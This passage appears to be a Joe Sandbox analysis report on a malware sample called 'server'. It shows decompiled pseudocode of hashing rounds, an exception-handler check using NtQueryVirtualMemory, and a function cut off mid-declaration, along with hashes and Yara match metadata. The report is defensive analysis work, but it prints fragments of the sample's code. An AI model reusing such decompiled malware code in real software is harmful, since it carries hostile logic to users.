				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}


































































































            0x007e16e2
            0x007e16e2
            0x007e16ed
            0x007e16f0
            0x007e16f3
            0x007e16f4
            0x007e1712
            0x007e1714
            0x007e1717
            0x007e171a
            0x007e171a
            0x007e171d
            0x007e1720
            0x007e1723
            0x007e1740
            0x007e1743
            0x007e1759
            0x007e175c
            0x007e1776
            0x007e1779
            0x007e178f
            0x007e1792
            0x007e1794
            0x007e17ac
            0x007e17af
            0x007e17b2
            0x007e17ca
            0x007e17cd
            0x007e17e7
            0x007e17ea
            0x007e1800
            0x007e1803
            0x007e1805
            0x007e181d
            0x007e1822
            0x007e1825
            0x007e183b
            0x007e183e
            0x007e1858
            0x007e185b
            0x007e1871
            0x007e1874
            0x007e1876
            0x007e1891
            0x007e1894
            0x007e18ab
            0x007e18ae
            0x007e18b2
            0x007e18cb
            0x007e18ce
            0x007e18d0
            0x007e18d3
            0x007e18ee
            0x007e18f1
            0x007e190a
            0x007e190d
            0x007e191d
            0x007e1920
            0x007e1938
            0x007e193b
            0x007e1955
            0x007e1958
            0x007e1970
            0x007e1973
            0x007e1989
            0x007e198c
            0x007e19a4
            0x007e19a7
            0x007e19bf
            0x007e19c2
            0x007e19dc
            0x007e19df
            0x007e19f5
            0x007e19f8
            0x007e1a10
            0x007e1a13
            0x007e1a2d
            0x007e1a30
            0x007e1a48
            0x007e1a4b
            0x007e1a61
            0x007e1a64
            0x007e1a7c
            0x007e1a7f
            0x007e1a97
            0x007e1a9a
            0x007e1aac
            0x007e1aaf
            0x007e1ac1
            0x007e1ac4
            0x007e1ad6
            0x007e1ad9
            0x007e1add
            0x007e1aed
            0x007e1af0
            0x007e1afe
            0x007e1b01
            0x007e1b13
            0x007e1b16
            0x007e1b2a
            0x007e1b2d
            0x007e1b2f
            0x007e1b3f
            0x007e1b42
            0x007e1b54
            0x007e1b57
            0x007e1b65
            0x007e1b68
            0x007e1b7a
            0x007e1b7d
            0x007e1b81
            0x007e1b91
            0x007e1b94
            0x007e1ba6
            0x007e1ba9
            0x007e1bb7
            0x007e1bba
            0x007e1bcc
            0x007e1bcf
            0x007e1be1
            0x007e1be4
            0x007e1bf8
            0x007e1bfb
            0x007e1c0f
            0x007e1c12
            0x007e1c26
            0x007e1c29
            0x007e1c3d
            0x007e1c40
            0x007e1c54
            0x007e1c57
            0x007e1c6b
            0x007e1c70
            0x007e1c82
            0x007e1c85
            0x007e1c99
            0x007e1c9c
            0x007e1cb0
            0x007e1cb3
            0x007e1cc9
            0x007e1ccc
            0x007e1ce0
            0x007e1ce3
            0x007e1cf5
            0x007e1cf8
            0x007e1d0c
            0x007e1d0f
            0x007e1d23
            0x007e1d26
            0x007e1d3a
            0x007e1d43
            0x007e1d46
            0x007e1d4f
            0x007e1d58
            0x007e1d60
            0x007e1d68
            0x007e1d72
            0x007e1d87

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: memset
            • String ID: KT~
            • API String ID: 2221118986-3940843352
            • Opcode ID: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
            • Instruction ID: 626e48845088ad36b6fd8623a078050afb049879f6a5d7c90b210b9cb2577e99
            • Opcode Fuzzy Hash: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
            • Instruction Fuzzy Hash: 2122857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E8551 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E007E8551(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x7ea380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x7ea3c8 = 1;
										__eflags =  *0x7ea3c8;
										if( *0x7ea3c8 != 0) {
											goto L60;
										}
										_t84 =  *0x7ea380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x7ea3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x7ea380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x7ea388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x7ea384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x7ea388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x7ea388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x7ea3c8 = 1;
							__eflags =  *0x7ea3c8;
							if( *0x7ea3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x7ea388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x7ea388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x7ea3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x7ea388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x7ea380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x7ea388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x7ea388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































            0x007e855b
            0x007e855e
            0x007e8564
            0x007e8582
            0x00000000
            0x007e8582
            0x007e856c
            0x007e8575
            0x007e857b
            0x007e858a
            0x007e858d
            0x007e8590
            0x007e859a
            0x007e859a
            0x007e859c
            0x007e859f
            0x007e85a1
            0x007e85a1
            0x007e85a3
            0x007e85a6
            0x00000000
            0x00000000
            0x007e85a8
            0x007e85aa
            0x007e8610
            0x007e8610
            0x007e876e
            0x00000000
            0x007e876e
            0x007e85ac
            0x007e85ac
            0x007e85b0
            0x007e85b2
            0x007e85b2
            0x007e85b2
            0x007e85b2
            0x007e85b5
            0x007e85b6
            0x007e85b9
            0x007e85b9
            0x007e85bd
            0x007e85c1
            0x007e85cf
            0x007e85cf
            0x007e85d7
            0x007e85dd
            0x007e85df
            0x007e85e1
            0x007e85f1
            0x007e85fe
            0x007e8602
            0x007e8607
            0x007e8609
            0x007e8687
            0x007e8687
            0x007e860b
            0x007e860b
            0x007e860b
            0x007e8689
            0x007e868b
            0x007e876c
            0x007e876c
            0x00000000
            0x007e8691
            0x007e8691
            0x007e8698
            0x00000000
            0x00000000
            0x007e869e
            0x007e86a2
            0x007e86fe
            0x007e8700
            0x007e8708
            0x007e870a
            0x007e870c
            0x00000000
            0x00000000
            0x007e870e
            0x007e8714
            0x007e8716
            0x007e8718
            0x007e872d
            0x007e872d
            0x007e872f
            0x007e875e
            0x007e8765
            0x00000000
            0x007e8765
            0x007e8733
            0x007e8734
            0x007e8736
            0x007e8738
            0x007e8738
            0x007e873a
            0x007e873c
            0x007e873e
            0x007e8752
            0x007e8752
            0x007e8755
            0x007e8757
            0x007e8757
            0x007e8758
            0x007e8758
            0x00000000
            0x007e8740
            0x007e8740
            0x007e8740
            0x007e8749
            0x007e874a
            0x007e874c
            0x007e874e
            0x007e874e
            0x00000000
            0x007e8740
            0x007e873e
            0x007e871a
            0x007e8721
            0x007e8721
            0x007e8723
            0x00000000
            0x00000000
            0x007e8725
            0x007e8726
            0x007e8729
            0x007e872b
            0x00000000
            0x00000000
            0x00000000
            0x007e872b
            0x00000000
            0x007e8721
            0x007e86a4
            0x007e86a7
            0x007e86ac
            0x00000000
            0x00000000
            0x007e86b5
            0x007e86b7
            0x007e86bd
            0x00000000
            0x00000000
            0x007e86c3
            0x007e86c9
            0x00000000
            0x00000000
            0x007e86cf
            0x007e86d1
            0x007e86da
            0x007e86de
            0x00000000
            0x00000000
            0x007e86e4
            0x007e86e7
            0x007e86e9
            0x00000000
            0x00000000
            0x007e86f0
            0x007e86f2
            0x00000000
            0x00000000
            0x007e86f4
            0x007e86f8
            0x00000000
            0x00000000
            0x00000000
            0x007e86f8
            0x00000000
            0x00000000
            0x00000000
            0x007e85e3
            0x007e85e3
            0x007e85e3
            0x007e85ea
            0x00000000
            0x00000000
            0x007e85ec
            0x007e85ed
            0x007e85ef
            0x00000000
            0x00000000
            0x00000000
            0x007e85ef
            0x007e8617
            0x007e8619
            0x00000000
            0x00000000
            0x007e8629
            0x007e862b
            0x007e862d
            0x00000000
            0x00000000
            0x007e8633
            0x007e863a
            0x007e8666
            0x007e8666
            0x007e8668
            0x007e866a
            0x007e867e
            0x007e8680
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x007e866c
            0x007e866c
            0x007e866c
            0x007e8675
            0x007e8676
            0x007e8678
            0x007e867a
            0x007e867a
            0x00000000
            0x007e866c
            0x007e863c
            0x007e863c
            0x007e863f
            0x007e8641
            0x007e8653
            0x007e8653
            0x007e8656
            0x007e8658
            0x007e8658
            0x007e8659
            0x007e8659
            0x007e865f
            0x007e865f
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x007e8643
            0x007e8643
            0x007e8643
            0x007e864a
            0x00000000
            0x00000000
            0x007e864c
            0x007e864c
            0x007e864d
            0x00000000
            0x00000000
            0x00000000
            0x007e864d
            0x007e864f
            0x007e8651
            0x007e8664
            0x00000000
            0x00000000
            0x00000000
            0x007e8664
            0x00000000
            0x007e8651
            0x007e85c3
            0x007e85c6
            0x007e85c9
            0x00000000
            0x00000000
            0x007e85cb
            0x007e85cd
            0x00000000
            0x00000000
            0x00000000
            0x007e85cd
            0x007e8592
            0x007e8594
            0x00000000
            0x00000000
            0x00000000
            0x00000000

            APIs
            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 007E8602
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: MemoryQueryVirtual
            • String ID:
            • API String ID: 2850889275-0
            • Opcode ID: 53c7dbaa4dee88497f363dab941aceb016fa0deffba20bd955b5a45631f00853
            • Instruction ID: b49c7ef94b5972603751b8b0ecdbf2849829e60149b4392125e1b79653578ebe
            • Opcode Fuzzy Hash: 53c7dbaa4dee88497f363dab941aceb016fa0deffba20bd955b5a45631f00853
            • Instruction Fuzzy Hash: EA61E4316026C19FCBA9CF6AC98062973A1FB8D354B348439D41ECB292EF3DDC428656
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004139B6 Relevance: .4, Instructions: 355COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.509538367.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
            • Instruction ID: 6a61aaf81cceb962ac43e89968d19062db41915cb31680b98768ff6a35e7641c
            • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
            • Instruction Fuzzy Hash: B4C1B373D5E5F3058B35492D05182BFEE626E81B4231FC3D2DCD43F289C22A6EA696D4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004135CE Relevance: .3, Instructions: 349COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.509538367.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
            • Instruction ID: 210b0bbc6fa7648ea2dec32900c8f8778a93b69b975d2da7577560c404c6e586
            • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
            • Instruction Fuzzy Hash: 0AC1D473D5A5F30587354A2D05182BBEEA16E81B4131FC392DCD43F389C22A6EA6D6D4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004131FC Relevance: .3, Instructions: 332COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.509538367.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
            • Instruction ID: 5199c5bc16864de70c6dcf7905d63cf28dc46ea8416786d032595d3cba67f2f8
            • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
            • Instruction Fuzzy Hash: 5AC1E533D5E5F3058B36492D05182BFEE626E81B4531FC3D2CCD43F689C62A6EA685D4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00412E5E Relevance: .3, Instructions: 326COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.509538367.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
            • Instruction ID: a2b0026a64bfaf7b2cdf986373f4502d60de115db649975ff53bd1799c231f25
            • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
            • Instruction Fuzzy Hash: C8B1D433D5A5F3058735852D05182BBEEA26E81B4131FC396DCD43F289C62AAEA692D4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E832C Relevance: .1, Instructions: 77COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 71%
            			E007E832C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E007E8497(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E007E8551(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E007E843C(_t55, _t66);
										_t89 = _t66 + 0x10;
										E007E8497(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E007E8533(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























            0x007e8330
            0x007e8331
            0x007e8332
            0x007e8335
            0x007e8337
            0x007e833a
            0x007e833b
            0x007e833d
            0x007e833e
            0x007e833f
            0x007e8342
            0x007e834c
            0x007e83fd
            0x007e8404
            0x007e840d
            0x007e8352
            0x007e8352
            0x007e8358
            0x007e835e
            0x007e8361
            0x007e8364
            0x007e8368
            0x007e836d
            0x007e8372
            0x007e83f2
            0x00000000
            0x007e8374
            0x007e8374
            0x007e8380
            0x007e8382
            0x007e83dd
            0x007e83dd
            0x007e83e3
            0x00000000
            0x007e8384
            0x007e8393
            0x007e8395
            0x007e8396
            0x007e8397
            0x007e839a
            0x007e839a
            0x007e839c
            0x00000000
            0x007e839e
            0x007e839e
            0x007e83e8
            0x007e83a0
            0x007e83a0
            0x007e83a4
            0x007e83ac
            0x007e83b1
            0x007e83b6
            0x007e83c2
            0x007e83ca
            0x007e83d1
            0x007e83d7
            0x007e83db
            0x00000000
            0x007e83db
            0x007e839e
            0x007e839c
            0x00000000
            0x007e8382
            0x007e83f6
            0x007e83f6
            0x007e83f6
            0x007e8372
            0x007e8412
            0x007e8419

            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
            • Instruction ID: bbc7a375474243a7e833a8e9b3b4633d0621fe9afaa75cccd8604b2b6eeb4bac
            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
            • Instruction Fuzzy Hash: F3212832901244DFCB10EF69C8C49ABBBA5FF49350B458168E819DB245EF34F925CBE1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 008551AC Relevance: .1, Instructions: 61COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_850000_server.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
            • Instruction ID: f8562ba4f6d4c0545a5e9f8261aed9a278ae4a135e11c9d9052b358a31e4377f
            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
            • Instruction Fuzzy Hash: 51118E72380504AFDB44DF59DCA1FA677EAFB88325B298065ED05CB316E675EC02C760
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00780D90 Relevance: .0, Instructions: 43COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
            • Instruction ID: c137a415cd33a37c16b2a2ea5c25f585a778bfd2a950d56cefb96e01b2f897f6
            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
            • Instruction Fuzzy Hash: 0C01F272B406008FDF61EF60C805BAB33E5FB86306F0544A4D90A97282E378A8498BD0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E2B91 Relevance: 37.8, APIs: 25, Instructions: 278memorystringCOMMON
            Download Yara Rule
            C-Code - Quality: 76%
            			E007E2B91(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
				intOrPtr _v4;
				signed int _v8;
				int* _v12;
				char* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				long _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				void* _t76;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				int* _t108;
				int* _t118;
				char** _t120;
				char* _t121;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr _t135;
				intOrPtr _t139;
				int _t142;
				intOrPtr _t144;
